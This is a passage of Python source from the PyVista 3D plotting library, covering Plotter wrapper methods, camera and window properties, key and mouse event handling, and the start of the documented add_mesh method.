@wraps(Renderer.view_xz)
def view_xz(self, *args, **kwarg):
"""Wrap ``Renderer.view_xz``."""
self.renderer.view_xz(*args, **kwarg)
@wraps(Renderer.view_zx)
def view_zx(self, *args, **kwarg):
"""Wrap ``Renderer.view_zx``."""
self.renderer.view_zx(*args, **kwarg)
@wraps(Renderer.view_yz)
def view_yz(self, *args, **kwarg):
"""Wrap ``Renderer.view_yz``."""
self.renderer.view_yz(*args, **kwarg)
@wraps(Renderer.view_zy)
def view_zy(self, *args, **kwarg):
"""Wrap ``Renderer.view_zy``."""
self.renderer.view_zy(*args, **kwarg)
@wraps(Renderer.disable)
def disable(self, *args, **kwarg):
"""Wrap ``Renderer.disable``."""
self.renderer.disable(*args, **kwarg)
@wraps(Renderer.enable)
def enable(self, *args, **kwarg):
"""Wrap ``Renderer.enable``."""
self.renderer.enable(*args, **kwarg)
@wraps(Renderer.enable_depth_peeling)
def enable_depth_peeling(self, *args, **kwargs):
"""Wrap ``Renderer.enable_depth_peeling``."""
if hasattr(self, 'ren_win'):
result = self.renderer.enable_depth_peeling(*args, **kwargs)
if result:
self.ren_win.AlphaBitPlanesOn()
return result
@wraps(Renderer.disable_depth_peeling)
def disable_depth_peeling(self):
"""Wrap ``Renderer.disable_depth_peeling``."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
return self.renderer.disable_depth_peeling()
@wraps(Renderer.get_default_cam_pos)
def get_default_cam_pos(self, *args, **kwargs):
"""Wrap ``Renderer.get_default_cam_pos``."""
return self.renderer.get_default_cam_pos(*args, **kwargs)
@wraps(Renderer.remove_actor)
def remove_actor(self, *args, **kwargs):
"""Wrap ``Renderer.remove_actor``."""
for renderer in self.renderers:
renderer.remove_actor(*args, **kwargs)
return True
@wraps(Renderer.set_environment_texture)
def set_environment_texture(self, *args, **kwargs):
"""Wrap ``Renderer.set_environment_texture``."""
return self.renderer.set_environment_texture(*args, **kwargs)
#### Properties from Renderer ####
@property
def camera(self):
"""Return the active camera of the active renderer."""
if not self.camera_set:
self.camera_position = self.get_default_cam_pos()
self.reset_camera()
self.camera_set = True
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return self.renderer.length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
@scale.setter
def scale(self, scale):
"""Set the scaling of the active renderer."""
self.renderer.set_scale(*scale)
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderer.camera_position = camera_location
@property
def background_color(self):
"""Return the background color of the active render window."""
return self.renderers.active_renderer.background_color
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
@property
def window_size(self):
"""Return the render window size in ``(width, height)``.
Examples
--------
Change the window size from ``200 x 200`` to ``400 x 400``.
>>> import pyvista
>>> pl = pyvista.Plotter(window_size=[200, 200])
>>> pl.window_size
[200, 200]
>>> pl.window_size = [400, 400]
>>> pl.window_size
[400, 400]
"""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
def _check_rendered(self):
"""Check if the render window has been shown and raise an exception if not."""
if not self._rendered:
raise AttributeError(
'\nThis plotter has not yet been set up and rendered '
'with ``show()``.\n'
'Consider setting ``off_screen=True`` '
'for off screen rendering.\n'
)
def _check_has_ren_win(self):
"""Check if render window attribute exists and raise an exception if not."""
if not hasattr(self, 'ren_win'):
raise AttributeError(
'\n\nTo retrieve an image after the render window '
'has been closed, set:\n\n'
' ``plotter.store_image = True``\n\n'
'before closing the plotter.'
)
@property
def image(self):
"""Return an image array of current render window.
To retrieve an image after the render window has been closed,
set: ``plotter.store_image = True`` before closing the plotter.
"""
if not hasattr(self, 'ren_win') and self.last_image is not None:
return self.last_image
self._check_rendered()
self._check_has_ren_win()
data = image_from_window(self.ren_win)
if self.image_transparent_background:
return data
# ignore alpha channel
return data[:, :, :-1]
def render(self):
"""Render the main window.
Does nothing until ``show`` has been called.
"""
if hasattr(self, 'ren_win') and not self._first_time:
log.debug('Rendering')
self.ren_win.Render()
self._rendered = True
@wraps(RenderWindowInteractor.add_key_event)
def add_key_event(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.add_key_event."""
if hasattr(self, 'iren'):
self.iren.add_key_event(*args, **kwargs)
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key.
Parameters
----------
key : str
Key to clear events for.
"""
self.iren.clear_events_for_key(key)
def store_mouse_position(self, *args):
"""Store mouse position."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.get_event_position()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.get_event_position()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks
supported here - use
:func:`pyvista.BasePlotter.track_click_position` instead.
"""
self.iren.track_mouse_position(self.store_mouse_position)
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
self.iren.untrack_mouse_position()
@wraps(RenderWindowInteractor.track_click_position)
def track_click_position(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.track_click_position."""
self.iren.track_click_position(*args, **kwargs)
@wraps(RenderWindowInteractor.untrack_click_position)
def untrack_click_position(self, *args, **kwargs):
"""Stop tracking the click position."""
self.iren.untrack_click_position(*args, **kwargs)
@property
def pickable_actors(self):
"""Return or set the pickable actors.
When setting, this will be the list of actors to make
pickable. All actors not in the list will be made unpickable.
If ``actors`` is ``None``, all actors will be made unpickable.
Returns
-------
list of vtk.vtkActors
Examples
--------
Add two actors to a :class:`pyvista.Plotter`, make one
pickable, and then list the pickable actors.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> sphere_actor = pl.add_mesh(pv.Sphere())
>>> cube_actor = pl.add_mesh(pv.Cube(), pickable=False, style='wireframe')
>>> len(pl.pickable_actors)
1
Set the pickable actors to both actors.
>>> pl.pickable_actors = [sphere_actor, cube_actor]
>>> len(pl.pickable_actors)
2
Set the pickable actors to ``None``.
>>> pl.pickable_actors = None
>>> len(pl.pickable_actors)
0
"""
pickable = []
for renderer in self.renderers:
for actor in renderer.actors.values():
if actor.GetPickable():
pickable.append(actor)
return pickable
@pickable_actors.setter
def pickable_actors(self, actors=None):
"""Set the pickable actors."""
actors = [] if actors is None else actors
if isinstance(actors, _vtk.vtkActor):
actors = [actors]
if not all([isinstance(actor, _vtk.vtkActor) for actor in actors]):
raise TypeError(
f'Expected a vtkActor instance or a list of vtkActors, got '
f'{[type(actor) for actor in actors]} instead.'
)
for renderer in self.renderers:
for actor in renderer.actors.values():
actor.SetPickable(actor in actors)
def _prep_for_close(self):
"""Make sure a screenshot is acquired before closing.
This doesn't actually close anything! It just preps the plotter for
closing.
"""
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size
and line width by the given value.
Parameters
----------
increment : float
Amount to increment point size and line width.
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
self.render()
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
if hasattr(self, 'iren'):
self.iren.clear_key_event_callbacks()
self.add_key_event('q', self._prep_for_close) # Add no matter what
b_left_down_callback = lambda: self.iren.add_observer(
'LeftButtonPressEvent', self.left_button_down
)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
@wraps(RenderWindowInteractor.key_press_event)
def key_press_event(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.key_press_event."""
self.iren.key_press_event(*args, **kwargs)
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
if hasattr(self.ren_win, 'GetOffScreenFramebuffer'):
if not self.ren_win.GetOffScreenFramebuffer().GetFBOIndex():
# must raise a runtime error as this causes a segfault on VTK9
raise ValueError('Invoking helper with no framebuffer')
# Get 2D click location on window
click_pos = self.iren.get_event_position()
# Get corresponding click location in the 3D plot
picker = _vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
@wraps(RenderWindowInteractor.enable_trackball_style)
def enable_trackball_style(self):
"""Wrap RenderWindowInteractor.enable_trackball_style."""
self.iren.enable_trackball_style()
@wraps(RenderWindowInteractor.enable_trackball_actor_style)
def enable_trackball_actor_style(self):
"""Wrap RenderWindowInteractor.enable_trackball_actor_style."""
self.iren.enable_trackball_actor_style()
@wraps(RenderWindowInteractor.enable_image_style)
def enable_image_style(self):
"""Wrap RenderWindowInteractor.enable_image_style."""
self.iren.enable_image_style()
@wraps(RenderWindowInteractor.enable_joystick_style)
def enable_joystick_style(self):
"""Wrap RenderWindowInteractor.enable_joystick_style."""
self.iren.enable_joystick_style()
@wraps(RenderWindowInteractor.enable_joystick_actor_style)
def enable_joystick_actor_style(self):
"""Wrap RenderWindowInteractor.enable_joystick_actor_style."""
self.iren.enable_joystick_actor_style()
@wraps(RenderWindowInteractor.enable_zoom_style)
def enable_zoom_style(self):
"""Wrap RenderWindowInteractor.enable_zoom_style."""
self.iren.enable_zoom_style()
@wraps(RenderWindowInteractor.enable_terrain_style)
def enable_terrain_style(self, *args, **kwargs):
"""Wrap RenderWindowInteractor.enable_terrain_style."""
self.iren.enable_terrain_style(*args, **kwargs)
@wraps(RenderWindowInteractor.enable_rubber_band_style)
def enable_rubber_band_style(self):
"""Wrap RenderWindowInteractor.enable_rubber_band_style."""
self.iren.enable_rubber_band_style()
@wraps(RenderWindowInteractor.enable_rubber_band_2d_style)
def enable_rubber_band_2d_style(self):
"""Wrap RenderWindowInteractor.enable_rubber_band_2d_style."""
self.iren.enable_rubber_band_2d_style()
def enable_stereo_render(self):
"""Enable stereo rendering.
Disable this with :func:`disable_stereo_render
<BasePlotter.disable_stereo_render>`
Examples
--------
Enable stereo rendering to show a cube as an anaglyph image.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.enable_stereo_render()
>>> pl.show()
"""
if hasattr(self, 'ren_win'):
self.ren_win.StereoRenderOn()
self.ren_win.SetStereoTypeToAnaglyph()
def disable_stereo_render(self):
"""Disable stereo rendering.
Enable again with :func:`enable_stereo_render
<BasePlotter.enable_stereo_render>`
Examples
--------
Enable and then disable stereo rendering. It should show a simple cube.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.enable_stereo_render()
>>> pl.disable_stereo_render()
>>> pl.show()
"""
if hasattr(self, 'ren_win'):
self.ren_win.StereoRenderOff()
def hide_axes_all(self):
"""Hide the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.hide_axes()
def show_axes_all(self):
"""Show the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.show_axes()
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.get_interactor_style()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor
in milliseconds.
force_redraw : bool, optional
Call ``render`` immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if self.iren is not None:
update_rate = self.iren.get_desired_update_rate()
if (curr_time - Plotter.last_update_time) > (1.0 / update_rate):
self.right_timer_id = self.iren.create_repeating_timer(stime)
self.render()
Plotter.last_update_time = curr_time
return
if force_redraw:
self.render()
def add_mesh(
self,
mesh,
color=None,
style=None,
scalars=None,
clim=None,
show_edges=None,
edge_color=None,
point_size=5.0,
line_width=None,
opacity=1.0,
flip_scalars=False,
lighting=None,
n_colors=256,
interpolate_before_map=True,
cmap=None,
label=None,
reset_camera=None,
scalar_bar_args=None,
show_scalar_bar=None,
multi_colors=False,
name=None,
texture=None,
render_points_as_spheres=None,
render_lines_as_tubes=False,
smooth_shading=None,
split_sharp_edges=False,
ambient=0.0,
diffuse=1.0,
specular=0.0,
specular_power=100.0,
nan_color=None,
nan_opacity=1.0,
culling=None,
rgb=None,
categories=False,
silhouette=False,
use_transparency=False,
below_color=None,
above_color=None,
annotations=None,
pickable=True,
preference="point",
log_scale=False,
pbr=False,
metallic=0.0,
roughness=0.5,
render=True,
component=None,
**kwargs,
):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method is using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.DataSet or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy
arrays of XYZ points.
color : color_like, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1.0, 1.0, 1.0]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : str, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name
of an array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active
scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : color_like, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also
applicable when style='points'. Default ``5.0``.
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a single float value is given, it
will be the global opacity of the mesh and uniformly
applied everywhere - should be between 0 and 1. A string
can also be specified to map the scalars range to a
predefined opacity transfer function (options include:
``'linear'``, ``'linear_r'``, ``'geom'``, ``'geom_r'``).
A string could also be used to map a scalars array from
the mesh to the opacity (must have same number of elements
as the ``scalars`` argument). Or you can pass a custom
made transfer function that is an array either
``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r``
suffix to do this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default ``False``.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is
``True``. When ``False``, OpenGL will interpolate the
mapped colors which can result is showing colors that are
not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to use when mapping the
``scalars``. See available Matplotlib colormaps. Only
applicable for when displaying ``scalars``. Requires
Matplotlib to be installed. ``colormap`` is also an
accepted alias for this. If ``colorcet`` or ``cmocean``
are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the
scalar bar to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If ``False``, a scalar bar will not be added to the
scene. Defaults to ``True``.
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or bool, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
Render points as spheres rather than dots.
render_lines_as_tubes : bool, optional
Show lines as thick tubes rather than flat lines. Control
the width with ``line_width``.
smooth_shading : bool, optional
Enable smooth shading when ``True`` using either the
Gouraud or Phong shading algorithm. When ``False``, use
flat shading. Automatically enabled when ``pbr=True``.
See :ref:`shading_example`.
split_sharp_edges : bool, optional
Split sharp edges exceeding 30 degrees when plotting with
smooth shading. Control the angle with the optional
keyword argument ``feature_angle``. By default this is
``False``. Note that enabling this will create a copy of
the input mesh within the plotter. See
:ref:`shading_example`.
ambient : float, optional
When lighting is enabled, this is the amount of light in
the range of 0 to 1 (default 0.0) that reaches the actor
when not directed at the light source emitted from the
viewer.
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0.
specular : float, optional
The specular lighting coefficient. Default 0.0.
specular_power : float, optional
The specular power. Between 0.0 and 128.0.
nan_color : color_like, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted
scalar array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0.
culling : str, optional
Does not render faces that are culled. Options are
``'front'`` or ``'back'``. This can be helpful for dense
surface meshes, especially when edges are visible, but can
cause flat meshes to be partially displayed. Defaults to
``False``.
rgb : bool, optional
If an 2 dimensional array is passed as the scalars, plot
those values as RGB(A) colors. ``rgba`` is also an
accepted alias for this. Opacity (the A) is optional. If
a scalars array ending with ``"_rgba"`` is passed, the default
becomes ``True``. This can be overridden by setting this
parameter to ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in
the scalar array will be used as the ``n_colors``
argument.
silhouette : dict, bool, optional
If set to ``True``, plot a silhouette highlight for the
mesh. This feature is only available for a triangulated
``PolyData``. As a ``dict``, it contains the properties
of the silhouette to display:
* ``color``: ``color_like``, color of the silhouette
* ``line_width``: ``float``, edge width
* ``opacity``: ``float`` between 0 and 1, edge transparency
* ``feature_angle``: If a ``float``, display sharp edges
exceeding that angle in degrees.
* ``decimate``: ``float`` between 0 and 1, level of decimation
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond
to transparency.
below_color : color_like, optional
Solid color for values below the scalars range
(``clim``). This will automatically set the scalar bar
``below_label`` to ``'Below'``.
above_color : color_like, optional
Solid color for values below the scalars range
(``clim``). This will automatically set the scalar bar
``above_label`` to ``'Above'``.
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float
values in the scalars range to annotate on the scalar bar
and the values are the the string annotations.
pickable : bool, optional
Set whether this actor is pickable.
preference : str, optional
When ``mesh.n_points == mesh.n_cells`` and setting
scalars, this parameter sets how the scalars will be
mapped to the mesh. Default ``'points'``, causes the
scalars will be associated with the mesh points. Can be
either ``'points'`` or ``'cells'``.
log_scale : bool, optional
Use log scale when mapping data to colors. Scalars less
than zero are mapped to the smallest representable
positive float. Default: ``True``.
pbr : bool, optional
Enable physics based rendering (PBR) if the mesh is
``PolyData``. Use the ``color`` argument to set the base
color. This is only available in VTK>=9.
metallic : float, optional
Usually this value is either 0 or 1 for a real material
but any value in between is valid. This parameter is only
used by PBR interpolation. Default value is 0.0.
roughness : float, optional
This value has to be between 0 (glossy) and 1 (rough). A
glossy material has reflections and a high specular
part. This parameter is only used by PBR
interpolation. Default value is 0.5.
render : bool, optional
Force a render when ``True``. Default ``True``.
component : int, optional
Set component of vector valued scalars to plot. Must be
nonnegative, if supplied. If ``None``, the magnitude of
the vector is plotted.
**kwargs : dict, optional
Optional developer keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the mesh.
Examples
--------
Add a sphere to the plotter and show it with a custom scalar
bar title.
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere,
... scalar_bar_args={'title': 'Z Position'})
>>> plotter.show()
Plot using RGB on a single cell. Note that since the number of
points and the number of cells are identical, we have to pass
``preference='cell'``.
>>> import pyvista
>>> import numpy as np
>>> vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]])
>>> faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]])
>>> mesh = pyvista.PolyData(vertices, faces)
>>> mesh.cell_data['colors'] = [[255, 255, 255],
... [0, 255, 0],
... [0, 0, 255],
... [255, 0, 0]]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
... rgb=True, preference='cell')
>>> plotter.camera_position='xy'
>>> plotter.show()
Note how this varies from ``preference=='point'``. This is
because each point is now being individually colored, versus
in ``preference=='point'``, each cell face is individually
colored.
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
... rgb=True, preference='point')
>>> plotter.camera_position='xy'
>>> plotter.show()
Plot a plane with a constant color and vary its opacity by point.
>>> plane = pyvista.Plane()
>>> plane.plot(color='b', opacity=np.linspace(0, 1, plane.n_points),
... show_edges=True)
"""
self.mapper = make_mapper(_vtk.vtkDataSetMapper)
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError(
f'Object type ({type(mesh)}) not supported for plotting in PyVista.'
)
##### Parse arguments to be used for all meshes #####
# Avoid mutating input
if scalar_bar_args is None:
scalar_bar_args = {'n_colors': n_colors}
else:
scalar_bar_args = scalar_bar_args.copy()
if show_edges is None:
show_edges = self._theme.show_edges
if show_scalar_bar is None:
show_scalar_bar = self._theme.show_scalar_bar
if lighting is None:
lighting = self._theme.lighting
if smooth_shading is None:
if pbr:
smooth_shading = True
else:
smooth_shading = self._theme.smooth_shading
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = self._theme.render_points_as_spheres
if name is None:
name = f'{type(mesh).__name__}({mesh.memory_address})'
nan_color = Color(
nan_color, default_opacity=nan_opacity, default_color=self._theme.nan_color
)
if color is True:
color = self._theme.color
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
feature_angle = kwargs.pop('feature_angle', 30)
# account for legacy behavior
if 'stitle' in kwargs: # pragma: no cover
warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning)
scalar_bar_args.setdefault('title', kwargs.pop('stitle'))
if "scalar" in kwargs:
raise TypeError(
"`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?"
)
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise TypeError(
'scalars array must be given as a string name for multiblock datasets.'
)
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if _has_matplotlib():
from itertools import cycle
import matplotlib
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, _vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
if silhouette:
if isinstance(silhouette, dict):
self.add_silhouette(mesh, silhouette)
else:
self.add_silhouette(mesh)
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None: # and np.issubdtype(mesh.active_scalars.dtype, np.number):
scalar_bar_args.setdefault('title', scalars)
else:
scalars = None
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
# enable rgb if the scalars name ends with rgb or rgba
if rgb is None:
if scalars.endswith('_rgb') or scalars.endswith('_rgba'):
rgb = True
original_scalar_name = scalars
scalars = get_array(mesh, scalars, preference=preference, err=True)
scalar_bar_args.setdefault('title', original_scalar_name)
# Compute surface normals if using smooth shading
if smooth_shading:
mesh, scalars = prepare_smooth_shading(
mesh, scalars, texture, split_sharp_edges, feature_angle, preference
)
if mesh.n_points < 1:
raise ValueError('Empty meshes cannot be plotted. Input mesh has zero points.')
# set main values
self.mesh = mesh
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor = _vtk.vtkActor()
prop = _vtk.vtkProperty()
actor.SetMapper(self.mapper)
actor.SetProperty(prop)
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (_vtk.vtkTexture, _vtk.vtkOpenGLTexture)):
raise TypeError(f'Invalid texture type ({type(texture)})')
if mesh.GetPointData().GetTCoords() is None:
raise ValueError(
'Input mesh does not have texture coordinates to support the texture.'
)
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# see https://github.com/pyvista/pyvista/issues/950
mesh.set_active_scalars(None)
# Handle making opacity array
custom_opac, opacity = process_opacity(
mesh, opacity, preference, n_colors, scalars, use_transparency
)
# Scalars formatting ==================================================
if scalars is not None:
show_scalar_bar, n_colors, clim = self.mapper.set_scalars(
mesh,
scalars,
scalar_bar_args,
rgb,
component,
preference,
interpolate_before_map,
custom_opac,
annotations,
log_scale,
nan_color,
above_color,
below_color,
cmap,
flip_scalars,
opacity,
categories,
n_colors,
clim,
self._theme,
show_scalar_bar,
)
elif custom_opac: # no scalars but custom opacity
self.mapper.set_custom_opacity(
opacity,
color,
mesh,
n_colors,
preference,
interpolate_before_map,
rgb,
self._theme,
)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = self._theme.outline_color
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise ValueError(
'Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n'
)
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
